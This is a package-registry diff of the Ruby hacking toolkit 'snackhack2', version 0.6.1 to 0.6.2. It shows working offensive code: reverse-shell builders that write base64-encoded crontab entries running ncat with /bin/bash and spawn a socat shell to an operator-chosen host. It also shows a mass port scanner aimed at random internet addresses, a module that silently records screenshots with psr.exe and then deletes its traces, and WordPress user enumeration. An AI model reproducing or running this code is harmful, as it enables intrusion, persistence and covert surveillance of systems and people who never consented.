snackhack2 0.6.1 → 0.6.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +4 -4
- data/lib/snackhack2/bannergrabber.rb +2 -2
- data/lib/snackhack2/bypass_403.rb +66 -0
- data/lib/snackhack2/comments.rb +25 -0
- data/lib/snackhack2/forward_remote.rb +24 -23
- data/lib/snackhack2/google_analytics.rb +2 -2
- data/lib/snackhack2/indirect_command_injection.rb +32 -27
- data/lib/snackhack2/iplookup.rb +17 -3
- data/lib/snackhack2/list_users.rb +23 -0
- data/lib/snackhack2/lists/directory-list-2.3-big.txt +1273818 -0
- data/lib/snackhack2/phone_number.rb +2 -3
- data/lib/snackhack2/portscan.rb +31 -11
- data/lib/snackhack2/reverse_shell.rb +9 -6
- data/lib/snackhack2/robots.rb +1 -0
- data/lib/snackhack2/screenshots.rb +23 -21
- data/lib/snackhack2/version.rb +1 -1
- data/lib/snackhack2/webserver_log_cleaner.rb +2 -1
- data/lib/snackhack2/website_links.rb +2 -2
- data/lib/snackhack2/website_meta.rb +2 -1
- data/lib/snackhack2/wordpress.rb +10 -5
- data/lib/snackhack2.rb +10 -4
- metadata +6 -2
|
@@ -2,9 +2,9 @@ require 'httparty'
|
|
|
2
2
|
require 'spidr'
|
|
3
3
|
module Snackhack2
|
|
4
4
|
class PhoneNumber
|
|
5
|
-
attr_accessor :save_file
|
|
5
|
+
attr_accessor :save_file, :site
|
|
6
6
|
|
|
7
|
-
def initialize(
|
|
7
|
+
def initialize(save_file: true)
|
|
8
8
|
@site = site
|
|
9
9
|
@save_file = save_file
|
|
10
10
|
end
|
|
@@ -27,7 +27,6 @@ module Snackhack2
|
|
|
27
27
|
if !numbers.empty?
|
|
28
28
|
if @save_file
|
|
29
29
|
hostname = URI.parse(@site).host
|
|
30
|
-
puts "[+] Saving to #{hostname}_phone_numbers.txt..."
|
|
31
30
|
Snackhack2::file_save(@site, "phone_numbers", numbers.join("\n"))
|
|
32
31
|
end
|
|
33
32
|
end
|
data/lib/snackhack2/portscan.rb
CHANGED
|
@@ -1,13 +1,14 @@
|
|
|
1
1
|
# frozen_string_literal: true
|
|
2
2
|
|
|
3
|
-
|
|
4
3
|
module Snackhack2
|
|
5
4
|
class PortScan
|
|
6
|
-
attr_accessor :display, :ip, :delete
|
|
7
|
-
|
|
8
|
-
|
|
5
|
+
attr_accessor :display, :ip, :delete, :count
|
|
6
|
+
|
|
7
|
+
def initialize(display: true, delete: false, count: 10)
|
|
8
|
+
@ip = ip
|
|
9
9
|
@display = display
|
|
10
|
-
@delete
|
|
10
|
+
@delete = delete
|
|
11
|
+
@count = count
|
|
11
12
|
end
|
|
12
13
|
|
|
13
14
|
def run
|
|
@@ -16,18 +17,36 @@ module Snackhack2
|
|
|
16
17
|
ports.each { |i| threads << Thread.new { tcp(i) } }
|
|
17
18
|
threads.each(&:join)
|
|
18
19
|
end
|
|
20
|
+
|
|
21
|
+
def mass_scan
|
|
22
|
+
generate_ips.each do |ips|
|
|
23
|
+
tcp = PortScan.new
|
|
24
|
+
tcp.ip = ips
|
|
25
|
+
tcp.run
|
|
26
|
+
end
|
|
27
|
+
end
|
|
28
|
+
|
|
29
|
+
def generate_ips
|
|
30
|
+
ips = []
|
|
31
|
+
@count.to_i.times do |c|
|
|
32
|
+
ips << Array.new(4) { rand(256) }.join('.')
|
|
33
|
+
end
|
|
34
|
+
ips
|
|
35
|
+
end
|
|
36
|
+
|
|
19
37
|
def ports_extractor(port)
|
|
20
|
-
ip=[]
|
|
38
|
+
ip = []
|
|
21
39
|
files = Dir['*_port_scan.txt']
|
|
22
40
|
files.each do |f|
|
|
23
|
-
r=File.read(f)
|
|
41
|
+
r = File.read(f)
|
|
24
42
|
if r.include?(port)
|
|
25
43
|
ip << f.split("_")[0]
|
|
26
44
|
end
|
|
27
|
-
|
|
45
|
+
File.delete(f) if delete
|
|
28
46
|
end
|
|
29
|
-
|
|
47
|
+
File.open("#{port}_scan.txt", 'w+') { |file| file.write(ip.join("\n")) }
|
|
30
48
|
end
|
|
49
|
+
|
|
31
50
|
def tcp(i)
|
|
32
51
|
ip = @ip
|
|
33
52
|
open_ports = []
|
|
@@ -36,18 +55,19 @@ module Snackhack2
|
|
|
36
55
|
s = TCPSocket.new(@ip, i)
|
|
37
56
|
s.close
|
|
38
57
|
open_ports << i
|
|
39
|
-
rescue Errno::ECONNREFUSED, Errno::EHOSTUNREACH
|
|
58
|
+
rescue Errno::ECONNREFUSED, Errno::EHOSTUNREACH, Errno::ENETUNREACH
|
|
40
59
|
return false
|
|
41
60
|
end
|
|
42
61
|
rescue Timeout::Error
|
|
43
62
|
end
|
|
44
63
|
return if open_ports.empty?
|
|
64
|
+
|
|
45
65
|
if @display
|
|
46
66
|
open_ports.each do |port|
|
|
47
67
|
puts "#{port} is open"
|
|
48
68
|
end
|
|
49
69
|
end
|
|
50
|
-
|
|
70
|
+
File.open("#{ip}_port_scan.txt", 'a') { |file| file.write(open_ports.shift.to_s + "\n") }
|
|
51
71
|
end
|
|
52
72
|
end
|
|
53
73
|
end
|
|
@@ -1,7 +1,8 @@
|
|
|
1
1
|
require 'base64'
|
|
2
2
|
module Snackhack2
|
|
3
3
|
class ReverseShell
|
|
4
|
-
|
|
4
|
+
attr_accessor :ip, :port
|
|
5
|
+
def initialize
|
|
5
6
|
@ip = ip
|
|
6
7
|
@port = port
|
|
7
8
|
end
|
|
@@ -12,17 +13,19 @@ module Snackhack2
|
|
|
12
13
|
(crontab -u $(whoami) -l; echo "$line" ) | crontab -u $(whoami) -}
|
|
13
14
|
puts "echo -n '#{Base64.encode64(c)}' | base64 -d >> t.sh; bash t.sh; rm t.sh;".delete!("\n")
|
|
14
15
|
end
|
|
16
|
+
|
|
15
17
|
def version2
|
|
16
|
-
|
|
18
|
+
c = %Q{#!/bin/bash
|
|
17
19
|
line="* * * * * ncat #{@ip} #{@port} -e /bin/bash"
|
|
18
|
-
(crontab -u $(whoami) -l; echo "$line" ) | crontab -u $(whoami) -}
|
|
19
|
-
|
|
20
|
+
(crontab -u $(whoami) -l; echo "$line" ) | crontab -u $(whoami) -}
|
|
21
|
+
puts "echo -n '#{Base64.encode64(c)}' | base64 -d >> t.sh; bash t.sh; rm t.sh;".delete!("\n")
|
|
20
22
|
end
|
|
23
|
+
|
|
21
24
|
def bash
|
|
22
|
-
|
|
25
|
+
c = %Q{
|
|
23
26
|
bash.exe -c "socat tcp-connect:#{@ip}:#{@port} exec:sh,pty,stderr,setsid,sigint,sane"
|
|
24
27
|
}
|
|
25
|
-
|
|
28
|
+
Process.spawn(c)
|
|
26
29
|
end
|
|
27
30
|
end
|
|
28
31
|
end
|
data/lib/snackhack2/robots.rb
CHANGED
|
@@ -1,21 +1,23 @@
|
|
|
1
|
-
require 'shellwords'
|
|
2
|
-
module Snackhack2
|
|
3
|
-
|
|
4
|
-
|
|
5
|
-
|
|
6
|
-
|
|
7
|
-
|
|
8
|
-
|
|
9
|
-
|
|
10
|
-
|
|
11
|
-
|
|
12
|
-
|
|
13
|
-
|
|
14
|
-
|
|
15
|
-
|
|
16
|
-
|
|
17
|
-
|
|
18
|
-
|
|
19
|
-
|
|
20
|
-
|
|
21
|
-
end
|
|
1
|
+
require 'shellwords'
|
|
2
|
+
module Snackhack2
|
|
3
|
+
class ScreenShot
|
|
4
|
+
attr_accessor :zip, :time
|
|
5
|
+
|
|
6
|
+
# https://lolbas-project.github.io/lolbas/Binaries/Psr/
|
|
7
|
+
def initialize
|
|
8
|
+
@zip = "screenshots.zip"
|
|
9
|
+
@time = 60
|
|
10
|
+
end
|
|
11
|
+
|
|
12
|
+
def run
|
|
13
|
+
File.open("lol.bat", 'w+') { |file| file.write("psr.exe /start /output #{@zip} /sc 1 /gui 0") }
|
|
14
|
+
File.open("lol2.bat", 'w+') { |file| file.write("psr.exe /stop") }
|
|
15
|
+
Process.spawn("lol.bat")
|
|
16
|
+
sleep @time.to_i
|
|
17
|
+
system("lol2.bat")
|
|
18
|
+
sleep 2
|
|
19
|
+
File.delete("lol.bat")
|
|
20
|
+
File.delete("lol2.bat")
|
|
21
|
+
end
|
|
22
|
+
end
|
|
23
|
+
end
|
data/lib/snackhack2/version.rb
CHANGED
|
@@ -4,9 +4,9 @@ require 'nokogiri'
|
|
|
4
4
|
require 'open-uri'
|
|
5
5
|
module Snackhack2
|
|
6
6
|
class WebsiteLinks
|
|
7
|
-
attr_accessor :save_file
|
|
7
|
+
attr_accessor :save_file, :site
|
|
8
8
|
|
|
9
|
-
def initialize(
|
|
9
|
+
def initialize(save_file: true)
|
|
10
10
|
@site = site
|
|
11
11
|
@save_file = save_file
|
|
12
12
|
end
|
data/lib/snackhack2/wordpress.rb
CHANGED
|
@@ -1,11 +1,12 @@
|
|
|
1
1
|
# frozen_string_literal: true
|
|
2
2
|
|
|
3
|
+
require 'nokogiri'
|
|
3
4
|
require 'json'
|
|
4
5
|
module Snackhack2
|
|
5
6
|
class WordPress
|
|
6
7
|
attr_accessor :save_file, :site
|
|
7
8
|
|
|
8
|
-
def initialize(
|
|
9
|
+
def initialize(save_file: true)
|
|
9
10
|
@site = site
|
|
10
11
|
@save_file = save_file
|
|
11
12
|
end
|
|
@@ -26,7 +27,7 @@ module Snackhack2
|
|
|
26
27
|
def users
|
|
27
28
|
found_users = ''
|
|
28
29
|
begin
|
|
29
|
-
users = Snackhack2::get(File.join(@site, "wp-
|
|
30
|
+
users = Snackhack2::get(File.join(@site, "wp-json", "wp", "v2", "users")).body
|
|
30
31
|
json = JSON.parse(users)
|
|
31
32
|
json.each do |k|
|
|
32
33
|
found_users += "#{k['name']}\n"
|
|
@@ -48,7 +49,7 @@ module Snackhack2
|
|
|
48
49
|
s = Snackhack2::get(File.join(@site, '/wp-content/uploads/'))
|
|
49
50
|
if s.code == 200
|
|
50
51
|
if s.body.include?('Index of')
|
|
51
|
-
puts "[+] #{File.join(@site, '/wp-content/uploads/')} is valid
|
|
52
|
+
puts "[+] #{File.join(@site, '/wp-content/uploads/')} is valid...\n\n\n"
|
|
52
53
|
end
|
|
53
54
|
end
|
|
54
55
|
end
|
|
@@ -74,8 +75,12 @@ module Snackhack2
|
|
|
74
75
|
def yoast_seo
|
|
75
76
|
ys = Snackhack2::get(@site)
|
|
76
77
|
if ys.code == 200
|
|
77
|
-
|
|
78
|
-
|
|
78
|
+
yoast_version = ys.body.split("<!-- This site is optimized with the Yoast SEO Premium plugin")[1].split(" -->")[0]
|
|
79
|
+
["This site is optimized with the Yoast SEO plugin",
|
|
80
|
+
"This site is optimized with the Yoast SEO Premium plugin"].each do |site|
|
|
81
|
+
if !ys.body.scan(/#{site}/).shift.nil?
|
|
82
|
+
puts "#{ys.body.scan(/#{site}/).shift.to_s} with version #{yoast_version}"
|
|
83
|
+
end
|
|
79
84
|
end
|
|
80
85
|
end
|
|
81
86
|
end
|
data/lib/snackhack2.rb
CHANGED
|
@@ -2,6 +2,7 @@
|
|
|
2
2
|
|
|
3
3
|
require 'uri'
|
|
4
4
|
require 'httparty'
|
|
5
|
+
|
|
5
6
|
require_relative 'snackhack2/version'
|
|
6
7
|
require_relative 'snackhack2/bannergrabber'
|
|
7
8
|
require_relative 'snackhack2/wordpress'
|
|
@@ -28,6 +29,9 @@ require_relative 'snackhack2/reverse_shell'
|
|
|
28
29
|
require_relative 'snackhack2/forward_remote'
|
|
29
30
|
require_relative 'snackhack2/screenshots'
|
|
30
31
|
require_relative 'snackhack2/indirect_command_injection'
|
|
32
|
+
require_relative 'snackhack2/list_users'
|
|
33
|
+
require_relative "snackhack2/bypass_403"
|
|
34
|
+
require_relative "snackhack2/comments"
|
|
31
35
|
|
|
32
36
|
module Snackhack2
|
|
33
37
|
UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
|
|
@@ -49,10 +53,11 @@ module Snackhack2
|
|
|
49
53
|
end
|
|
50
54
|
end
|
|
51
55
|
end
|
|
52
|
-
|
|
53
|
-
|
|
54
|
-
|
|
55
|
-
|
|
56
|
+
|
|
57
|
+
def self.file_save(site, type, content, ip: false)
|
|
58
|
+
hostname = URI.parse(site).host
|
|
59
|
+
File.open("#{hostname}_#{type}.txt", 'w+') { |file| file.write(content) }
|
|
60
|
+
puts "[+] Saving file to #{hostname}_#{type}.txt..."
|
|
56
61
|
end
|
|
57
62
|
|
|
58
63
|
def self.get(site)
|
|
@@ -65,6 +70,7 @@ module Snackhack2
|
|
|
65
70
|
File.delete(file)
|
|
66
71
|
end
|
|
67
72
|
end
|
|
73
|
+
|
|
68
74
|
def self.read_portscan
|
|
69
75
|
files = Dir['*_port_scan.txt']
|
|
70
76
|
files.each do |f|
|
metadata
CHANGED
|
@@ -1,14 +1,14 @@
|
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
|
2
2
|
name: snackhack2
|
|
3
3
|
version: !ruby/object:Gem::Version
|
|
4
|
-
version: 0.6.
|
|
4
|
+
version: 0.6.2
|
|
5
5
|
platform: ruby
|
|
6
6
|
authors:
|
|
7
7
|
- mike
|
|
8
8
|
autorequire:
|
|
9
9
|
bindir: exe
|
|
10
10
|
cert_chain: []
|
|
11
|
-
date: 2024-
|
|
11
|
+
date: 2024-10-19 00:00:00.000000000 Z
|
|
12
12
|
dependencies:
|
|
13
13
|
- !ruby/object:Gem::Dependency
|
|
14
14
|
name: httparty
|
|
@@ -77,6 +77,8 @@ files:
|
|
|
77
77
|
- lib/snackhack2/Honeywell_PM43.rb
|
|
78
78
|
- lib/snackhack2/WP_Symposium.rb
|
|
79
79
|
- lib/snackhack2/bannergrabber.rb
|
|
80
|
+
- lib/snackhack2/bypass_403.rb
|
|
81
|
+
- lib/snackhack2/comments.rb
|
|
80
82
|
- lib/snackhack2/cryptoextractor.rb
|
|
81
83
|
- lib/snackhack2/drupal.rb
|
|
82
84
|
- lib/snackhack2/emails.rb
|
|
@@ -84,6 +86,8 @@ files:
|
|
|
84
86
|
- lib/snackhack2/google_analytics.rb
|
|
85
87
|
- lib/snackhack2/indirect_command_injection.rb
|
|
86
88
|
- lib/snackhack2/iplookup.rb
|
|
89
|
+
- lib/snackhack2/list_users.rb
|
|
90
|
+
- lib/snackhack2/lists/directory-list-2.3-big.txt
|
|
87
91
|
- lib/snackhack2/lists/sshbrute.txt
|
|
88
92
|
- lib/snackhack2/lists/subdomains.txt
|
|
89
93
|
- lib/snackhack2/phone_number.rb
|